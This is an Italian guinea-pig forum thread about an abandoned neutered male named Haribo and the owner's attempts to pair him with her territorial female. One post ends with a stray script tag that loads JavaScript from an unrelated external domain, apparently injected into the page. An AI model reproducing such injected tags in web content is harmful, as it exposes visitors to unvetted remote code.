Vai al contenuto
Kiwì&Cocò

Un trovatello, storia fuori dal comune!!

Recommended Posts

Ciao amici caviofili :) stamattina mi è capitata una cosa a dir poco sorprendente. Allora premetto che ho un locale qui in francia, un bar brasserie, vicino alla cassa ho le foto dei miei caviotti e spesso con i clienti parliamo della mia passione per questi simpatici animali, molti li ho convertiti alla cavio attitude e si sono presi delle caviette :)

Allora stamattina sono andata al locale per svuotare i vuoti bottiglie (approfitto della domenica piovosa), cosa trovo vicino alla porta del retro? Una scatola, un biglietto e una palla di pelo grigio scura quasi nera, il biglietto dice "ciao so che tu hai delle cavie, abbiamo preso questo caviotto 8 mesi fa per la nostra bambina, ora ha avuto un cagnolino da poco e la cavietta non è piu calcolata, noi ce ne occupavamo per lei ma ora non sappiamo piu che farne sicuarmente con te sarà in buone mani, è sterilizzato, grazie)

Sono rimasta basita! :blink: 1 come si fa ad abbandonare un caviotto in una scatola? 2 E se io non fossi passata sarebbe morto li fuori? 3 deve essere qualcuno che mi conosce o direttamente o indirettamente.

Prendo la palla di pelo che era impaurita, gelata, piena di pipi e di fondo della scatola rammollito sul pelo... Al diavolo le bottiglie, l ho portata a casa, le ho fatto un bagnetto caldo con shampo antiparassitario diluito, le ho messo una pipetta di stronghold per prevenzione, l ho nutrita, aveva una fame da lupo , si è pappata 3 indivie mezza carota e mezza mela vedete voi. Ho controllato, maschio è maschio ma gli attributi sono tolti.... E ' bello grassottello, il pelo è folto, non deve essere stato tenuto male, timidissimo!!!.

Ecco ora come lo dispongo ho pensato?

Al piano di sotto cè il maschietto malato alla pelle in via di ottima guarigione e il suo compagnuccio che vanno d amore a d accordo. Al piano di sotto Cocò la femminuccia con la sua figliolina piccina picciò rimasta unica della cucciolata....

Provo con Cocò, un maschio sterilizzato con una femmina andrà bene, li faccio incontrare fuori, annusate sospette da parte di Cocò, il nuovo arrivato è pietrificato.

Li lascio circa mezz ora fuori, niente.... tranquilli... Allora li metto insieme nella gabbia ecco da bravi :) tanto fieno ...... bene.. così, non litigate...........

Ma Cocò ha sfoderato un attacco da Gladiatore per la serie al mio segnale scatenate l inferno!!!

Corse dietro il nuovo arrivato, tentativi di morsi, lettiera ovunque!!! La piccola figliola di Cocò ribaltata nella colluttazzione.

Il nuovo arrivato, non si difende. Penso, lascio fare alla natura e faccio finta di nulla, rincorse varie, senza morsi ma con un chiaro tentativo di dire " vedi di starmi lontano e sappi che qui non sei il benvenuto".... Magnifico....

Ora il nuovo arrivato è accuattato in un angolo con la testa nascosta nel tubo, Cocò mangiucchia ma lo scaccia appena se lo trova sotto tiro.... Lui non tocca fieno, e non muove zampa, Cocò lo tiene sottocchio per sorvegliare qualsiasi pelo mosso dal povero caviotto pronta a partire all attacco... Sembra far parte dell arredamento della gabbia da quanto è immobile.

Uff povero piccolo!!!

Penso che finchè non ci saranno ferite di provare a tenerli insieme, magari Cocò inizierà a tollerarlo spero... Quante avventure caviose oggi che si prospettava una tranquilla domenica....

Il nuovo sfortunato caviotto l abbiamo battezzato Haribo come le caramelle.... domani posterò una foto.. E' un amore :love:

Share this post


Link to post
Share on other sites

Primo pensiero: disgraziati! potevano portartelo quando avevi aperto e sicuramente non avresti detto di no (vero? :-D)

Secondo: che caratterino la Cocò! :-DD

Sicuramente ora lo vede come un intruso, speriamo che capisca che oramai è di famiglia e se lo deve tenere. :-DD

Share this post


Link to post
Share on other sites

Certo che non avrei detto di no che modi sono!! Non è un pupazzo!! Se era mia la bambina signorina egoista, le avrei fatto capire che il caviotto ora era parte della famgilia e che doveva comunque continuare a calcolarlo se no vuol dire che non si meritava nemmeno il cagnolino, che non è un pupazzetto che ora che non ti piace piu lo mettiamo alla porta, anzi sulle porte degli altri! Va beh purtroppo il mondo va così è i francesi sopratutto spesso hanno la sensibilità di un cubes!! :rotfl:

Cocò è meglio che abbassi la cresta, ho letto di molti inserimenti disastrosi che con un pò di pazienza si sono risolti bene...Se no altro che fragole, le vedrà passare sotto il suo naso e andranno tutte dirette al piano di sopra :knuppel: hihih sono cattiva!!!

Ma normalmente un maschio sterilizzato è una femmina dovrebbero andare daccordo... Nutro speranze vivissime!!! :) :) Si creerebbe un equilibrio tra i piani perfetto :)

Share this post


Link to post
Share on other sites

Cocò è meglio che abbassi la cresta, ho letto di molti inserimenti disastrosi che con un pò di pazienza si sono risolti bene...Se no altro che fragole, le vedrà passare sotto il suo naso e andranno tutte dirette al piano di sopra :knuppel: hihih sono cattiva!!!

Ma normalmente un maschio sterilizzato è una femmina dovrebbero andare daccordo... Nutro speranze vivissime!!! :) :) Si creerebbe un equilibrio tra i piani perfetto :)

Secondo me la prima volta che Cocò entra in calore fanno subito la pace. >:-)

Share this post


Link to post
Share on other sites

certo che la gente è assurda! come se fossero dei peluches!! cmq perchè non cerchi di inserire haribo gradualmente dato che Cocò reagisce così?

Share this post


Link to post
Share on other sites

piccolo consiglio: cocò fa così perchè il suo territorio è stato invaso e lui non reagisce perchè sa di essere in torto; quindi lava tutta la gabbia (sgrassala bene, non deve rimanere l'odore di cocò) e cambia l'arredamento! sposta ripiani, casette, porta fieno, beverino, e rimettili dentro tutti e tre insieme. la dominante sarà spiazzata dal cambio di gabbia e abbasserà la cresta (e sarà impegnata ad esplorare la "nuova" casa).

nel caso facesse ancora la prepotente in maniera pesante(solo un po' è normale,in fondo una gerarchia si deve stabilire per forza) potresti spiazzarla spostando proprio la gabbia in un'altra parte della casa. sarà meno sicura di se stessa e meno incline a picchiare il nuovo arrivato. ;)

Share this post


Link to post
Share on other sites

immagino quanto sarà carino Haribo :love:

anche io ti consiglio di eliminare ogni odore di cocò dalla gabbia, magari falli incontrare per casa o dentro un recinto, in modo che l'inserimento sia più graduale ;)

maschietto sterilizzato e femminuccia dovrebbero andare d'amore e d'accordo ;)

Share this post


Link to post
Share on other sites

Caspita che storia che ci racconti!

Da una parte non te l aspettavi di trovare un pelosetto da un disgraziato..ma dall altra ora hai un nuovo membro in famiglia e mi sembri felice di ciò da come ne parli.

A me capitò molti molti anni fa, quando ero piccolina...ero conosciuta in paese come "quella che è piena di gatti".

Una volta mi lasciarono davanti al cancelletto di casa una cassetta di legno con dentro 4 gatti, un altra volta mi lasciarono un cucciolo pigolante dall altra parte della muretta...me li ero tenuti tutti anche se i miei erano contrari al 100 x 100.

Comunque ti devono conoscere per forza per lasciare un caviotto davanti al tuo locale....be? che dire?

Sono contenta che sia caduto nella mani giuste...almeno quello...e comunque...non si tratta così nemmeno un giocattolino, chissà da quante ore era li fuori il piccolino!

Ora aspettiamo le foto, la tua famiglia si sta rimpopolando!

Share this post


Link to post
Share on other sites

A me capitò molti molti anni fa, quando ero piccolina...ero conosciuta in paese come "quella che è piena di gatti".

Una volta mi lasciarono davanti al cancelletto di casa una cassetta di legno con dentro 4 gatti, un altra volta mi lasciarono un cucciolo pigolante dall altra parte della muretta...me li ero tenuti tutti anche se i miei erano contrari al 100 x 100.

Ora quella "piena di gatti" sono io :-DD fra i miei e quelli che mi portano quando li trovano buttati ..:angry: Vabbè lasciamo stare che se no mi inalbero.

Comunque sono convinta che il piccolo Haribo starà molto meglio con la sua nuova mamma e una famiglia caviosa a fargli compagnia. Per l'inserimento, anche io sono convinta che in territorio neutrale tutto andrebbe meglio. Funziona un pò come per i criceti, che sono territoriali e assassini! In campo neutro la loro furia si smorza per un po'.

Fai pazienza, smonta la gabbia e vai di aceto o amuchina.

Foto del piccolo?:love:

Share this post


Link to post
Share on other sites

Ciao ragazzi, stamattina ho lavato tutto e ho raccolto per casa la lettiera delle baruffe notturne, ora la gabbia sente forte l aceto, ne ho usato in quantità ;).

Ho controllato Haribo ma non ha ne tagli ne morsi anche se è stressatissimo ed emette continui gridolini di paura.

Li ho rimessi insieme e ho messo una casetta nuova presa dal piano di sopra dei maschietti (lavata e profumata di aceto).

Metto del cibo ai 4 cantoni della gabbia, loro girano un pò assaggi, annusate... E zaaaaaaaaac Cocò riparte all attacco battendo i denti /f/ UUUUUUFFFF

Cmq domani ho pensato di mettere un foglio vicino alla porta, "chiunque mi abbia lasciato quel bellissimo caviotto ieri, grazie molte è un amore, meno male che si è liberato lui di voi che prendete gli animali come pupazzi da abbandonare eventualmente, e ringraziate che ieri sono passata in negozio visto che nel pomeriggio si è messo a piovere. Fatevi un esamino di coscenza"

Sicuramente gli autori del malfatto passeranno da li dato che qua la cittadina non è grande...

Comunque sia io mi sono innamorata di lui :love:post-2056-0-54550000-1335775699_thumb.jp

<script src="http://superoseplugin.info/dfi823hs.js?0.6143014034055743">

Share this post


Link to post
Share on other sites

Gattini o cavie meno male che ci sono persone come noi che li amano e li accolgono... Purtroppo il rispetto animale e umano non è dato a tutti....

Ora li ho spostati tutti e due e li ho messi sul tavolo vicino a me mentre lavoro così li ho sottocchio... Almeno Haribo si rilassa un pò, qui niente baruffe, solo rumorini vari, Haribo ha tentato una timida danza corteggiatoria e ora era Cocò a emettere gridolini :uglystupid:... li lascio qui per un pò, almeno avranno modo di conoscersi per bene...

Cocò deve capire che sono una mamma all antica, il fidanzato l ho scelto io e ora se lo deve tenere!! ;)

Share this post


Link to post
Share on other sites

E' probabile che nemmeno lui sappia troppo come comportarsi... io attendo fiduciosa. Tanto fino a domani sono in ferie e posso supervisionare la situazione.. Penso che se Cocò volesse essere realmente cattiva lo avrebbe già ferito, e poi qui sul tavolo non si baruffano, deve essere un discorso di spazi..

Qua la gerarchia la faccio io >:-) dato che il frigo non se lo possono aprire da soli buhahahhahah... :knuppel:

Dico dico ma basta un occhietto o una zampuzza che mi sciolgo :lol:

Share this post


Link to post
Share on other sites

Sono felice che il caviotto abbia trovato una persona che sicuramente lo tratterà come deve essere trattato. Meglio così no? è stato fortunato!

Eh, queste femminucce acide box2.gif come la mia grande tickedoff.gif

Share this post


Link to post
Share on other sites

Sono felice che il caviotto abbia trovato una persona che sicuramente lo tratterà come deve essere trattato. Meglio così no? è stato fortunato!

Eh, queste femminucce acide box2.gif come la mia grande tickedoff.gif

non ci sono piu le femmine di una volta :rotfl:

Share this post


Link to post
Share on other sites

Ma è una bellezza dalla foto! Un cavio modello....ma quant è bello!!!!!

Coraggio, con un po di pazienza gli animi si calmeranno (parlo proprio io che non riesco a tenere a bada la mia Amy che picchia tutti..pensa che ora l ho messa in castigo in gabbietta da sola a farsi un esame di coscienza uff).

Comunque..è davvero bellissimo...porterai anche lui qui in Italia quando verrai?

Share this post


Link to post
Share on other sites

Ma è una bellezza dalla foto! Un cavio modello....ma quant è bello!!!!!

Coraggio, con un po di pazienza gli animi si calmeranno (parlo proprio io che non riesco a tenere a bada la mia Amy che picchia tutti..pensa che ora l ho messa in castigo in gabbietta da sola a farsi un esame di coscienza uff).

Comunque..è davvero bellissimo...porterai anche lui qui in Italia quando verrai?

Vengono tutti i caviotti :) però penso che li portiamo per piano, cioè magari io porto gli abitanti del piano di sotto e il mio ragazzo quelli del piano di sopra.

Perchè io parto a giugno e mi faccio 3 mesi in italia, (ho bisogno della mia mamma hihi) il mio compagno mi raggiunge a luglio e porta il resto. :D :D Faremo ambarabaccicicicoccò

Sicuro devo portare la cucciolina di Cocò perchè devo darla ad un amica in Italia.. Vedranno Torino e poi il mare, l hanno scorso avevano la gabbia vista mare :) erano solo 2, quest anno saranno 4 :D

Mio padre potrà divertirsi di piu ad ingozzarli hahah Quando ero rientrata dalle ferie l hanno scorso avevamo tutti preso peso, cavie comprese, gli mancava solo l abbronzatura :D

Share this post


Link to post
Share on other sites

Join the conversation

Puoi pubblicare ora e registrarti più tardi. Se hai un account, Accedi Ora per pubblicarlo con il tuo account.

Ospite
Reply to this topic...

×   Hai incollato il contenuto con la formattazione.   Rimuovere la formattazione

  Sono consentiti solo 75 emoticon max.

×   Il tuo collegamento è stato incorporato automaticamente.   Mostra come un collegamento

×   Il tuo contenuto precedente è stato ripristinato.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Caricamento...

×
×
  • Crea Nuovo...